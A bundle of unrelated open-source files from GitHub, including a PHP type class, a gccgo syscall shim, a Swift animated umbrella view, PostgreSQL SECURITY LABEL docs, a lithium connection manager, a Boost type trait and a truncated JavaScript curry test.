[ThreadStatic]
internal static glTexPageCommitmentARB pglTexPageCommitmentARB;
}
}
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Orientation Test using classnames</title>
<!-- Allow pinch-zoom: locking maximum-scale / user-scalable blocks zooming
     and fails WCAG; it is not needed for the orientation test itself. -->
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<link rel="stylesheet" href="../iui/iui.css" type="text/css" />
<link rel="stylesheet" title="Default" href="../iui/t/default/default-theme.css" type="text/css"/>
<script type="text/javascript" src="../iui/iui.js"></script>
<style type="text/css">
/* CSS to add ": True" or ": False" after headings to indicate orientation */
/* These rules look for a body class of either "landscape" or "portrait" */
div.panel > h2:after { content: ": False"; }
div.panel > h2.neither:after { content: ": True"; }
body.landscape > div.panel > h2.landscape:after { content: ": True"; }
body.landscape > div.panel > h2.neither:after { content: ": False"; }
body.portrait > div.panel > h2.portrait:after { content: ": True"; }
body.portrait > div.panel > h2.neither:after { content: ": False"; }
</style>
</head>
<body>
<div class="toolbar">
<h1 id="pageTitle"></h1>
</div>
<div id="main" title="Orient @class" class="panel" selected="true">
<h2 class="portrait">Portrait</h2>
<h2 class="landscape">Landscape</h2>
<h2 class="neither">Unknown</h2>
</div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
<?php
/**
* This file is part of phpDocumentor.
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*
* @copyright 2010-2015 Mike van Riel<[email protected]>
* @license http://www.opensource.org/licenses/mit-license.php MIT
* @link http://phpdoc.org
*/
namespace phpDocumentor\Reflection\Types;
use ArrayIterator;
use IteratorAggregate;
use phpDocumentor\Reflection\Type;
/**
* Value Object representing a Compound Type.
*
* A Compound Type is not so much a special keyword or object reference but is a series of Types that are separated
* using an OR operator (`|`). This combination of types signifies that whatever is associated with this compound type
* may contain a value with any of the given types.
*/
final class Compound implements Type, IteratorAggregate
{
    /** @var Type[] the alternative types that make up this compound type */
    private $types;

    /**
     * Initializes a compound type (i.e. `string|int`), verifying that every
     * provided element implements the Type interface.
     *
     * @param Type[] $types
     *
     * @throws \InvalidArgumentException when any element is not a Type instance
     */
    public function __construct(array $types)
    {
        foreach ($types as $candidate) {
            if (!($candidate instanceof Type)) {
                throw new \InvalidArgumentException('A compound type can only have other types as elements');
            }
        }

        $this->types = $types;
    }

    /**
     * Returns the type registered at the given index, or null when absent.
     *
     * @param integer $index
     *
     * @return Type|null
     */
    public function get($index)
    {
        return $this->has($index) ? $this->types[$index] : null;
    }

    /**
     * Tests whether a type is registered under the given index.
     *
     * @param integer $index
     *
     * @return bool
     */
    public function has($index)
    {
        return isset($this->types[$index]);
    }

    /**
     * Renders this compound type as it would appear in a DocBlock (`a|b|c`).
     *
     * @return string
     */
    public function __toString()
    {
        return implode('|', $this->types);
    }

    /**
     * {@inheritdoc}
     */
    public function getIterator()
    {
        return new ArrayIterator($this->types);
    }
}
| {
"pile_set_name": "Github"
} |
// Copyright 2015 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build gccgo
// +build !aix
#include <errno.h>
#include <stdint.h>
#include <unistd.h>
#define _STRINGIFY2_(x) #x
#define _STRINGIFY_(x) _STRINGIFY2_(x)
#define GOSYM_PREFIX _STRINGIFY_(__USER_LABEL_PREFIX__)
// Call syscall from C code because the gccgo support for calling from
// Go to C does not support varargs functions.
/*
 * Two-word return value mirroring Go's (r1, err) convention: r holds the
 * raw syscall result and err holds the captured errno value.
 */
struct ret {
	uintptr_t r;
	uintptr_t err;
};

/*
 * Invoke the variadic libc syscall() with up to nine arguments and report
 * both the result and errno. errno is cleared first so that a stale value
 * from an earlier call cannot be mistaken for a failure of this one.
 */
struct ret
gccgoRealSyscall(uintptr_t trap, uintptr_t a1, uintptr_t a2, uintptr_t a3, uintptr_t a4, uintptr_t a5, uintptr_t a6, uintptr_t a7, uintptr_t a8, uintptr_t a9)
{
	struct ret r;

	errno = 0;
	r.r = syscall(trap, a1, a2, a3, a4, a5, a6, a7, a8, a9);
	r.err = errno;

	return r;
}

/*
 * Same as above for syscalls whose Go wrappers never return an error:
 * only the raw result is passed back and errno is not inspected.
 */
uintptr_t
gccgoRealSyscallNoError(uintptr_t trap, uintptr_t a1, uintptr_t a2, uintptr_t a3, uintptr_t a4, uintptr_t a5, uintptr_t a6, uintptr_t a7, uintptr_t a8, uintptr_t a9)
{
	return syscall(trap, a1, a2, a3, a4, a5, a6, a7, a8, a9);
}
| {
"pile_set_name": "Github"
} |
<html>
<head>
<title>Map test page</title>
</head>
<body>
<!-- Static snapshot of Google Maps marker markup: an absolutely positioned
     marker <img> paired with an image map (gmimap0) whose polygonal <area>
     traces the marker outline. Presumably used as a fixture for hit-testing
     or scraping tests - confirm with whatever test loads this page. -->
<div style="position: absolute; left: 0px; top: 0px; z-index: 106;"><img style="position: absolute; left: 271px; top: 320px; width: 20px; height: 34px; -moz-user-select: none; border: 0px none; padding: 0px; margin: 0px; z-index: -140270496;" src="markerTransparent.png" class="gmnoprint" usemap="#gmimap0"><map name="gmimap0" id="gmimap0"><area log="miw" coords="9,0,6,1,4,2,2,4,0,8,0,12,1,14,2,16,5,19,7,23,8,26,9,30,9,34,11,34,11,30,12,26,13,24,14,21,16,18,18,16,20,12,20,8,18,4,16,2,15,1,13,0" shape="poly" alt="" href="javascript:void(0)" id="mtgt_unnamed_0" style="position: absolute; left: 159px; top: 342px;"></map></div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2017 by frePPLe bv
*
* This library is free software; you can redistribute it and/or modify it
* under the terms of the GNU Affero General Public License as published
* by the Free Software Foundation; either version 3 of the License, or
* (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero
* General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public
* License along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*/
// Shared AngularJS module used across the frePPLe screens.
angular.module("frepple.common", []);

// URL prefix for the active scenario. The global `database` variable is
// injected into the page by Django.
angular.module("frepple.common").constant('getURLprefix',
  function getURLprefix() {
    if (database === 'default') {
      return '';
    }
    return '/' + database;
  }
);

// Filter rendering a moment.js instance with an optional format string,
// defaulting to 'YYYY-MM-DD HH:mm:ss'. Falsy input renders as ''.
angular.module("frepple.common").filter('dateTimeFormat',
  function dateTimeFormat() {
    return function (input, fmt) {
      if (!input) {
        return '';
      }
      return input.format(fmt || 'YYYY-MM-DD HH:mm:ss');
    };
  }
);
| {
"pile_set_name": "Github"
} |
o:
D:
D:
2:
D:
l:
D:
u: | {
"pile_set_name": "Github"
} |
//
// Umbrella.swift
// RainyRefresh
//
// Created by Anton Dolzhenko on 16.11.16.
// Copyright © 2016 Onix Systems. All rights reserved.
//
import UIKit
/// Whether the umbrella is drawn folded (closed) or unfolded (opened).
enum UmbrellaState {
    case closed
    case opened

    /// Animation progress backing the layer drawing:
    /// 0 for an open umbrella, 1 for a closed one.
    var value: CGFloat {
        switch self {
        case .opened:
            return 0.0
        case .closed:
            return 1.0
        }
    }
}
/// UIView whose backing layer (UmbrellaLayer) draws an animatable umbrella.
/// The view only forwards configuration and state changes to the layer.
final class UmbrellaView:UIView {
    /// Stroke width forwarded to the backing layer at init time.
    var lineWidth:CGFloat = 1.0
    /// Stroke color forwarded to the backing layer at init time.
    var strokeColor: UIColor = .white
    /// Current open/closed state; mutated only through setButtonState(state:animated:).
    private(set) var state = UmbrellaState.closed

    /// Proxy for the layer's animatable progress value (1 = closed, 0 = opened).
    /// Returns 0.0 if the backing layer is not an UmbrellaLayer.
    private var animationValue: CGFloat {
        set {
            if let layer = layer as? UmbrellaLayer {
                layer.animationValue = newValue
            }
        }
        get {
            if let layer = layer as? UmbrellaLayer {
                return layer.animationValue
            }
            return 0.0
        }
    }

    // Make UmbrellaLayer the class of this view's backing layer.
    override class var layerClass : AnyClass {
        return UmbrellaLayer.self
    }

    override init(frame: CGRect) {
        super.init(frame: frame)
        // Push the drawing configuration into the backing layer; contentsScale
        // must match the screen scale or the layer renders blurry.
        if let layer = layer as? UmbrellaLayer {
            layer.contentsScale = UIScreen.main.scale
            layer.lineWidth = lineWidth
            layer.strokeColor = strokeColor
        }
        // Start fully closed (progress 1).
        animationValue = 1
    }

    // NOTE(review): this path does not configure the backing layer or the
    // initial animationValue like init(frame:) does - confirm whether
    // nib/storyboard instantiation is supported.
    required init?(coder aDecoder: NSCoder) {
        super.init(coder: aDecoder)
    }

    // MARK: - Methods
    /// Transitions the umbrella to the given state, optionally animating the
    /// layer's progress value. No-op when the state is unchanged.
    func setButtonState(state: UmbrellaState, animated: Bool) {
        if self.state == state {
            return
        }
        self.state = state
        let toValue: CGFloat = state.value
        if animated {
            UIView.animate(withDuration: 0.25, animations: {
                self.animationValue = toValue
            })
        } else {
            animationValue = toValue
        }
    }
}
/// CALayer that strokes an umbrella shape whose fold/unfold is driven by the
/// custom animatable property `animationValue` (0 = opened, 1 = closed).
final class UmbrellaLayer:CALayer {
    // @NSManaged lets Core Animation manage storage so the property can be
    // animated implicitly and read from the presentation layer.
    @NSManaged var animationValue: CGFloat
    // Stroke configuration; set by the owning UmbrellaView.
    var lineWidth:CGFloat = 1.0
    var strokeColor:UIColor = .white

    // Control points for the umbrella canopy curves, recomputed from
    // animationValue in update(). Upper-case points are curve endpoints,
    // lower-case points appear to be the matching Bezier control points.
    private var APoint:CGPoint!
    private var aPoint:CGPoint!
    private var a1Point:CGPoint!
    private var BPoint:CGPoint!
    private var bPoint:CGPoint!
    private var b1Point:CGPoint!
    private var CPoint:CGPoint!
    private var cPoint:CGPoint!
    private var DPoint:CGPoint!
    private var dPoint:CGPoint!
    private var d1Point:CGPoint!
    private var EPoint:CGPoint!
    private var ePoint:CGPoint!
    private var e1Point:CGPoint!
    private var FPoint:CGPoint!

    // True only for our custom animatable key.
    fileprivate class func isCustomAnimKey(_ key: String) -> Bool {
        return key == "animationValue"
    }

    // Redraw whenever animationValue changes (each animation frame).
    override class func needsDisplay(forKey key: String) -> Bool {
        if self.isCustomAnimKey(key) {
            return true
        }
        return super.needsDisplay(forKey: key)
    }

    // Provide an implicit animation for animationValue by borrowing the
    // action Core Animation would use for backgroundColor and retargeting
    // its keyPath; fromValue is read from the in-flight presentation layer
    // so animations can be retargeted smoothly.
    override func action(forKey event: String) -> CAAction? {
        if UmbrellaLayer.isCustomAnimKey(event) {
            if let animation = super.action(forKey: "backgroundColor") as? CABasicAnimation {
                animation.keyPath = event
                if let pLayer = presentation() {
                    animation.fromValue = pLayer.animationValue
                }
                animation.toValue = nil
                return animation
            }
            setNeedsDisplay()
            return nil
        }
        return super.action(forKey: event)
    }

    // Recompute every endpoint/control point from the current animationValue.
    // Each coordinate interpolates linearly between the opened (value 0) and
    // closed (value 1) positions; the constants are hand-tuned fractions of
    // the layer's bounds.
    func update() {
        let midX = bounds.midX
        let midY = bounds.midY
        let width = bounds.width
        let height = bounds.height
        APoint = CGPoint(x: (midX-width*0.4133)+(width*0.3633*animationValue), y: (midY+0.055*height)+(height*0.0683*animationValue))
        aPoint = CGPoint(x: (midX-width*0.385)+(width*0.3366*animationValue), y: (midY-height*0.3716)-(height*0.0016*animationValue))
        a1Point = CGPoint(x: (midX-width*0.3033)+(width*0.265*animationValue), y: (midY-height*0.1166)+(height*0.07*animationValue))
        BPoint = CGPoint(x: (midX-width*0.2033)+(width*0.1783*animationValue), y: (midY+height*0.0433)+(height*0.0783*animationValue))
        bPoint = CGPoint(x: (midX-width*0.2233)+(width*0.1957*animationValue), y: (midY-height*0.295)+(height*0.0129*animationValue))
        b1Point = CGPoint(x: (midX-width*0.0892)+(width*0.0792*animationValue), y: (midY-height*0.105)+(height*0.105*animationValue))
        CPoint = CGPoint(x: midX, y: (midY+height*0.0433)+(height*0.0783*animationValue))
        DPoint = CGPoint(x: (midX+width*0.2033)-(width*0.1783*animationValue), y: (midY+height*0.0433)+(height*0.0783*animationValue))
        dPoint = CGPoint(x: (midX+width*0.2175)-(width*0.1908*animationValue), y: (midY-height*0.295)+(height*0.0129*animationValue))
        d1Point = CGPoint(x: (midX+width*0.0894)-(width*0.0778*animationValue), y:(midY-height*0.105)+(height*0.105*animationValue))
        EPoint = CGPoint(x: (midX+width*0.4133)-(width*0.3633*animationValue), y: (midY+height*0.0566)+(height*0.0666*animationValue))
        ePoint = CGPoint(x: (midX+width*0.385)-(width*0.3366*animationValue), y: (midY-height*0.375)+(height*0.0016*animationValue))
        e1Point = CGPoint(x: (midX+width*0.3116)-(width*0.2733*animationValue), y: (midY-height*0.1091)+(height*0.0625*animationValue))
        FPoint = CGPoint(x: midX, y: (midY-height*0.3683)-(0.0016*animationValue))
    }

    // Stroke the umbrella: a straight vertical shaft, then the canopy as a
    // set of cubic Bezier curves built from the points computed in update().
    override func draw(in ctx: CGContext) {
        super.draw(in: ctx)
        ctx.setStrokeColor(strokeColor.cgColor)
        ctx.setLineWidth(lineWidth)
        update()
        //// Draw a handle
        let bezierPath = UIBezierPath()
        bezierPath.move(to: CGPoint(x: bounds.midX, y: bounds.midY+bounds.height*0.4266))
        bezierPath.addLine(to: CGPoint(x: bounds.midX, y: bounds.midY-bounds.height*0.415))
        // Each tuple is (start, end, controlPoint1, controlPoint2) of one curve.
        let arrayOfDots:[(CGPoint,CGPoint,CGPoint,CGPoint)] = [(APoint,FPoint,aPoint,FPoint),
                                                               (FPoint,EPoint,FPoint,ePoint),
                                                               (BPoint,FPoint,bPoint,FPoint),
                                                               (APoint,BPoint,a1Point,BPoint),
                                                               (BPoint,CPoint,b1Point,CPoint),
                                                               (DPoint,CPoint,d1Point,CPoint),
                                                               (FPoint,DPoint,FPoint,dPoint),
                                                               (DPoint,EPoint,DPoint,e1Point)]
        arrayOfDots.forEach { (a,b,c,d) in
            bezierPath.move(to: a)
            bezierPath.addCurve(to: b, controlPoint1: c, controlPoint2: d)
        }
        ctx.addPath(bezierPath.cgPath)
        ctx.setLineCap(.round)
        ctx.strokePath()
    }
}
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.servicecomb.service.center.client.model;
/**
 * Response payload of the service-center "get schema" call, carrying the
 * schema content as a plain string.
 */
public class GetSchemaResponse {
  /** Schema content; {@code null} until populated. */
  private String schema;

  /**
   * @return the schema content, or {@code null} when not set
   */
  public String getSchema() {
    return schema;
  }

  /**
   * @param schema the schema content to carry in this response
   */
  public void setSchema(String schema) {
    this.schema = schema;
  }
}
| {
"pile_set_name": "Github"
} |
<!--
doc/src/sgml/ref/security_label.sgml
PostgreSQL documentation
-->
<refentry id="SQL-SECURITY-LABEL">
<refmeta>
<refentrytitle>SECURITY LABEL</refentrytitle>
<manvolnum>7</manvolnum>
<refmiscinfo>SQL - Language Statements</refmiscinfo>
</refmeta>
<refnamediv>
<refname>SECURITY LABEL</refname>
<refpurpose>define or change a security label applied to an object</refpurpose>
</refnamediv>
<indexterm zone="sql-security-label">
<primary>SECURITY LABEL</primary>
</indexterm>
<refsynopsisdiv>
<synopsis>
SECURITY LABEL [ FOR <replaceable class="PARAMETER">provider</replaceable> ] ON
{
TABLE <replaceable class="PARAMETER">object_name</replaceable> |
COLUMN <replaceable class="PARAMETER">table_name</replaceable>.<replaceable class="PARAMETER">column_name</replaceable> |
AGGREGATE <replaceable class="PARAMETER">agg_name</replaceable> (<replaceable class="PARAMETER">agg_type</replaceable> [, ...] ) |
DATABASE <replaceable class="PARAMETER">object_name</replaceable> |
DOMAIN <replaceable class="PARAMETER">object_name</replaceable> |
FOREIGN TABLE <replaceable class="PARAMETER">object_name</replaceable> |
FUNCTION <replaceable class="PARAMETER">function_name</replaceable> ( [ [ <replaceable class="parameter">argmode</replaceable> ] [ <replaceable class="parameter">argname</replaceable> ] <replaceable class="parameter">argtype</replaceable> [, ...] ] ) |
LARGE OBJECT <replaceable class="PARAMETER">large_object_oid</replaceable> |
[ PROCEDURAL ] LANGUAGE <replaceable class="PARAMETER">object_name</replaceable> |
ROLE <replaceable class="PARAMETER">object_name</replaceable> |
SCHEMA <replaceable class="PARAMETER">object_name</replaceable> |
SEQUENCE <replaceable class="PARAMETER">object_name</replaceable> |
TABLESPACE <replaceable class="PARAMETER">object_name</replaceable> |
TYPE <replaceable class="PARAMETER">object_name</replaceable> |
VIEW <replaceable class="PARAMETER">object_name</replaceable>
} IS '<replaceable class="PARAMETER">label</replaceable>'
</synopsis>
</refsynopsisdiv>
<refsect1>
<title>Description</title>
<para>
<command>SECURITY LABEL</command> applies a security label to a database
object. An arbitrary number of security labels, one per label provider, can
be associated with a given database object. Label providers are loadable
modules which register themselves by using the function
<function>register_label_provider</>.
</para>
<note>
<para>
<function>register_label_provider</> is not an SQL function; it can
only be called from C code loaded into the backend.
</para>
</note>
<para>
The label provider determines whether a given label is valid and whether
it is permissible to assign that label to a given object. The meaning of a
given label is likewise at the discretion of the label provider.
<productname>PostgreSQL</> places no restrictions on whether or how a
label provider must interpret security labels; it merely provides a
mechanism for storing them. In practice, this facility is intended to allow
integration with label-based mandatory access control (MAC) systems such as
<productname>SE-Linux</>. Such systems make all access control decisions
based on object labels, rather than traditional discretionary access control
(DAC) concepts such as users and groups.
</para>
</refsect1>
<refsect1>
<title>Parameters</title>
<variablelist>
<varlistentry>
<term><replaceable class="parameter">object_name</replaceable></term>
<term><replaceable class="parameter">table_name.column_name</replaceable></term>
<term><replaceable class="parameter">agg_name</replaceable></term>
<term><replaceable class="parameter">function_name</replaceable></term>
<listitem>
<para>
The name of the object to be labeled. Names of tables,
aggregates, domains, foreign tables, functions, sequences, types, and
views can be schema-qualified.
</para>
</listitem>
</varlistentry>
<varlistentry>
<term><replaceable class="parameter">provider</replaceable></term>
<listitem>
<para>
The name of the provider with which this label is to be associated. The
named provider must be loaded and must consent to the proposed labeling
operation. If exactly one provider is loaded, the provider name may be
omitted for brevity.
</para>
</listitem>
</varlistentry>
<varlistentry>
<term><replaceable class="parameter">agg_type</replaceable></term>
<listitem>
<para>
An input data type on which the aggregate function operates.
To reference a zero-argument aggregate function, write <literal>*</>
in place of the list of input data types.
</para>
</listitem>
</varlistentry>
<varlistentry>
<term><replaceable class="parameter">argmode</replaceable></term>
<listitem>
<para>
The mode of a function argument: <literal>IN</>, <literal>OUT</>,
<literal>INOUT</>, or <literal>VARIADIC</>.
If omitted, the default is <literal>IN</>.
Note that <command>SECURITY LABEL ON FUNCTION</command> does not actually
pay any attention to <literal>OUT</> arguments, since only the input
arguments are needed to determine the function's identity.
So it is sufficient to list the <literal>IN</>, <literal>INOUT</>,
and <literal>VARIADIC</> arguments.
</para>
</listitem>
</varlistentry>
<varlistentry>
<term><replaceable class="parameter">argname</replaceable></term>
<listitem>
<para>
The name of a function argument.
Note that <command>SECURITY LABEL ON FUNCTION</command> does not actually
pay any attention to argument names, since only the argument data
types are needed to determine the function's identity.
</para>
</listitem>
</varlistentry>
<varlistentry>
<term><replaceable class="parameter">argtype</replaceable></term>
<listitem>
<para>
The data type(s) of the function's arguments (optionally
schema-qualified), if any.
</para>
</listitem>
</varlistentry>
<varlistentry>
<term><replaceable class="parameter">large_object_oid</replaceable></term>
<listitem>
<para>
The OID of the large object.
</para>
</listitem>
</varlistentry>
<varlistentry>
<term><literal>PROCEDURAL</literal></term>
<listitem>
<para>
This is a noise word.
</para>
</listitem>
</varlistentry>
<varlistentry>
<term><replaceable class="parameter">label</replaceable></term>
<listitem>
<para>
The new security label, written as a string literal; or <literal>NULL</>
to drop the security label.
</para>
</listitem>
</varlistentry>
</variablelist>
</refsect1>
<refsect1>
<title>Examples</title>
<para>
The following example shows how the security label of a table might
be changed.
<programlisting>
SECURITY LABEL FOR selinux ON TABLE mytable IS 'system_u:object_r:sepgsql_table_t:s0';
</programlisting></para>
</refsect1>
<refsect1>
<title>Compatibility</title>
<para>
There is no <command>SECURITY LABEL</command> command in the SQL standard.
</para>
</refsect1>
<refsect1>
<title>See Also</title>
<simplelist type="inline">
<member><xref linkend="sepgsql"></member>
<member><xref linkend="dummy-seclabel"></member>
</simplelist>
</refsect1>
</refentry>
| {
"pile_set_name": "Github"
} |
<?php
/**
* li₃: the most RAD framework for PHP (http://li3.me)
*
* Copyright 2009, Union of RAD. All rights reserved. This source
* code is distributed under the terms of the BSD 3-Clause License.
* The full license text can be found in the LICENSE.txt file.
*/
namespace lithium\data;
use lithium\core\Libraries;
/**
* The `Connections` class manages a list of named configurations that connect to external
* resources. Connections are usually comprised of a type (i.e. `'database'` or `'http'`), a
* reference to an adapter class (i.e. `'MySql'` or `'CouchDb'`), and authentication credentials.
*
* While connections can be added and removed dynamically during the course of your application
* (using `Connections::add()`), it is most typical to define all connections at once, in
* `config/bootstrap/connections.php`.
*
* The `Connections` class handles adapter classes efficiently by only loading adapter classes and
* creating instances when they are requested (using `Connections::get()`).
*
* Adapters are usually subclasses of `lithium\data\Source`.
*
* @see lithium\data\Source
*/
class Connections extends \lithium\core\Adaptable {

	/**
	 * A Collection of the configurations you add through Connections::add().
	 *
	 * @var `lithium\util\Collection`
	 */
	protected static $_configurations = [];

	/**
	 * Libraries::locate() compatible path to adapters for this class.
	 *
	 * @var string Dot-delimited path.
	 */
	protected static $_adapters = 'data.source';

	/**
	 * Add connection configurations to your app in `config/bootstrap/connections.php`
	 *
	 * For example:
	 * ```
	 * Connections::add('default', [
	 *     'type' => 'database',
	 *     'adapter' => 'MySql',
	 *     'host' => 'localhost',
	 *     'login' => 'root',
	 *     'password' => '',
	 *     'database' => 'my_blog'
	 * ]);
	 * ```
	 *
	 * or
	 *
	 * ```
	 * Connections::add('couch', [
	 *     'type' => 'http',
	 *     'adapter' => 'CouchDb',
	 *     'host' => '127.0.0.1',
	 *     'port' => 5984
	 * ]);
	 * ```
	 *
	 * or
	 *
	 * ```
	 * Connections::add('mongo', [
	 *     'type' => 'MongoDb',
	 *     'database' => 'my_app'
	 * ]);
	 * ```
	 *
	 * @see lithium\data\Model::$_meta
	 * @param string $name The name by which this connection is referenced. Use this name to
	 *        retrieve the connection again using `Connections::get()`, or to bind a model to it
	 *        using `Model::$_meta['connection']`.
	 * @param array $config Contains all additional configuration information used by the
	 *        connection, including the name of the adapter class where applicable (i.e. `MySql`),
	 *        and typcially the server host/socket to connect to, the name of the database or
	 *        other entity to use. Each adapter has its own specific configuration settings for
	 *        handling things like connection persistence, data encoding, etc. See the
	 *        individual adapter or data source class for more information on what configuration
	 *        settings it supports. Basic / required options supported are:
	 *        - `'type'` _string_: The type of data source that defines this connection; typically a
	 *          class or namespace name. Relational database data sources, use `'database'`, while
	 *          CouchDB and other HTTP-related data sources use `'http'`, etc. For classes which
	 *          directly extend `lithium\data\Source`, and do not use an adapter, simply use the
	 *          name of the class, i.e. `'MongoDb'`.
	 *        - `'adapter'` _string_: For `type`s such as `'database'` which are adapter-driven,
	 *          provides the name of the adapter associated with this configuration.
	 * @return array Returns the final post-processed connection information, as stored in the
	 *         internal configuration array used by `Connections`.
	 */
	public static function add($name, array $config = []) {
		// Ensure the two required keys always exist; the caller's values win.
		$defaults = [
			'type' => null,
			'adapter' => null
		];
		return static::$_configurations[$name] = $config + $defaults;
	}

	/**
	 * Removing a configuration.
	 *
	 * @param string $name The name by which this connection is referenced.
	 */
	public static function remove($name) {
		unset(static::$_configurations[$name]);
	}

	/**
	 * Read the configuration or access the connections you have set up.
	 *
	 * Usage:
	 * ```
	 * // Gets the names of all available configurations
	 * $configurations = Connections::get();
	 *
	 * // Gets the configuration array for the connection named 'db'
	 * $config = Connections::get('db', ['config' => true]);
	 *
	 * // Gets the instance of the connection object, configured with the settings defined for
	 * // this object in Connections::add()
	 * $dbConnection = Connections::get('db');
	 *
	 * // Gets the connection object, but only if it has already been built.
	 * // Otherwise returns null.
	 * $dbConnection = Connections::get('db', ['autoCreate' => false]);
	 * ```
	 *
	 * @param string $name The name of the connection to get, as defined in the first parameter of
	 *        `add()`, when the connection was initially created.
	 * @param array $options Options to use when returning the connection:
	 *        - `'autoCreate'`: If `false`, the connection object is only returned if it has
	 *          already been instantiated by a previous call.
	 *        - `'config'`: If `true`, returns an array representing the connection's internal
	 *          configuration, instead of the connection itself.
	 * @return mixed A configured instance of the connection, or an array of the configuration used.
	 */
	public static function get($name = null, array $options = []) {
		// Lazily-created Mock data source, shared across all calls with `false`.
		static $mockAdapter;

		$defaults = ['config' => false, 'autoCreate' => true];
		$options += $defaults;

		// `false` requests the bare Mock data source rather than a named
		// connection.
		if ($name === false) {
			if (!$mockAdapter) {
				$class = Libraries::locate('data.source', 'Mock');
				$mockAdapter = new $class();
			}
			return $mockAdapter;
		}

		// No name given: list the names of all registered configurations.
		if (!$name) {
			return array_keys(static::$_configurations);
		}

		if (!isset(static::$_configurations[$name])) {
			return null;
		}
		// Return the processed configuration array instead of an instance.
		if ($options['config']) {
			return static::_config($name);
		}
		$settings = static::$_configurations[$name];

		// With autoCreate disabled, only hand back a connection that was
		// already instantiated (stored at `$settings[0]['object']` by
		// Adaptable - presumably; confirm against lithium\core\Adaptable).
		if (!isset($settings[0]['object']) && !$options['autoCreate']) {
			return null;
		}
		return static::adapter($name);
	}

	/**
	 * Constructs a data source or adapter object instance from a configuration array.
	 *
	 * @param array $config
	 * @param array $paths
	 * @return object
	 */
	protected static function _class($config, $paths = []) {
		if (!$config['adapter']) {
			// No explicit adapter: the type itself names the source class
			// (e.g. 'MongoDb').
			$config['adapter'] = $config['type'];
		} else {
			// Adapter-driven type: search the type-specific adapter path first.
			$paths = array_merge(["adapter.data.source.{$config['type']}"], (array) $paths);
		}
		return parent::_class($config, $paths);
	}
}
?> | {
"pile_set_name": "Github"
} |
// (C) Copyright Dave Abrahams, Steve Cleary, Beman Dawes, Howard
// Hinnant & John Maddock 2000.
// Use, modification and distribution are subject to the Boost Software License,
// Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt).
//
// See http://www.boost.org/libs/type_traits for most recent version including documentation.
#ifndef BOOST_TT_REMOVE_CONST_HPP_INCLUDED
#define BOOST_TT_REMOVE_CONST_HPP_INCLUDED
#include <boost/config.hpp>
#include <cstddef>
#include <boost/detail/workaround.hpp>
namespace boost {

// convert a type T to a non-cv-qualified type - remove_const<T>
// Primary template: T carries no top-level const, pass it through unchanged.
template <class T> struct remove_const{ typedef T type; };
// Partial specialization stripping a top-level const qualifier.
template <class T> struct remove_const<T const>{ typedef T type; };

#if !defined(BOOST_NO_ARRAY_TYPE_SPECIALIZATIONS)
// Arrays need their own specializations: const on an array type applies to
// the elements, so `T const[N]` must map to `T[N]`.
template <class T, std::size_t N> struct remove_const<T const[N]>{ typedef T type[N]; };
// Unbounded-array form, guarded out on compilers that mis-handle it
// (old Borland, IBM xlC, Digital Mars).
#if !BOOST_WORKAROUND(__BORLANDC__, < 0x600) && !defined(__IBMCPP__) && !BOOST_WORKAROUND(__DMC__, BOOST_TESTED_AT(0x840))
template <class T> struct remove_const<T const[]>{ typedef T type[]; };
#endif
#endif

} // namespace boost
#endif // BOOST_TT_REMOVE_CONST_HPP_INCLUDED
| {
"pile_set_name": "Github"
} |
/*
* Based on nios2-generic.c:
* (C) Copyright 2005, Psyent Corporation <www.psyent.com>
* Scott McNutt <[email protected]>
* (C) Copyright 2010, Thomas Chou <[email protected]>
*
* SPDX-License-Identifier: GPL-2.0+
*/
#include <common.h>
#include <netdev.h>
/*
 * Early board initialization hook. No board-specific setup is required
 * here; return 0 to signal success.
 */
int board_early_init_f(void)
{
	return 0;
}
/*
 * Print the board identification banner. CONFIG_BOARD_NAME comes from the
 * board configuration. Returns 0 for success.
 */
int checkboard(void)
{
	printf("BOARD: %s\n", CONFIG_BOARD_NAME);
	return 0;
}
/*
 * Report the usable DRAM size. This port reports 0 -- presumably the
 * memory layout is fixed by the board configuration rather than probed
 * here (TODO confirm against the board's config header).
 */
phys_size_t initdram(int board_type)
{
	return 0;
}
#ifdef CONFIG_CMD_NET
/*
 * Register the board's network devices. When CONFIG_ETHOC is set, an
 * OpenCores Ethernet MAC at CONFIG_SYS_ETHOC_BASE is registered; rc
 * accumulates ethoc_initialize()'s return value (presumably the number of
 * devices registered -- confirm against the ethoc driver).
 */
int board_eth_init(bd_t *bis)
{
	int rc = 0;
#ifdef CONFIG_ETHOC
	rc += ethoc_initialize(0, CONFIG_SYS_ETHOC_BASE);
#endif
	return rc;
}
#endif
| {
"pile_set_name": "Github"
} |
import { equal } from 'assert';
import curry from '../curry';
import reduce from '../reduce';
import compose from '../compose';
test('#curry', () => {
  // Binary function: a single curry() lets arguments be supplied one at a time.
  const f = (a, b) => a + b;
  equal(curry(f)(1)(2), 3);
  // Ternary function: one curry() splits the call into two groups, and the
  // remaining arguments may be bundled on either side of the split.
  const g = (a, b, c) => a + b + c;
  equal(
    curry(g)(1)(2, 3),
    6
  );
  equal(
    curry(g)(1, 2)(3),
    6
  );
  // Composing curry with itself yields full one-argument-at-a-time
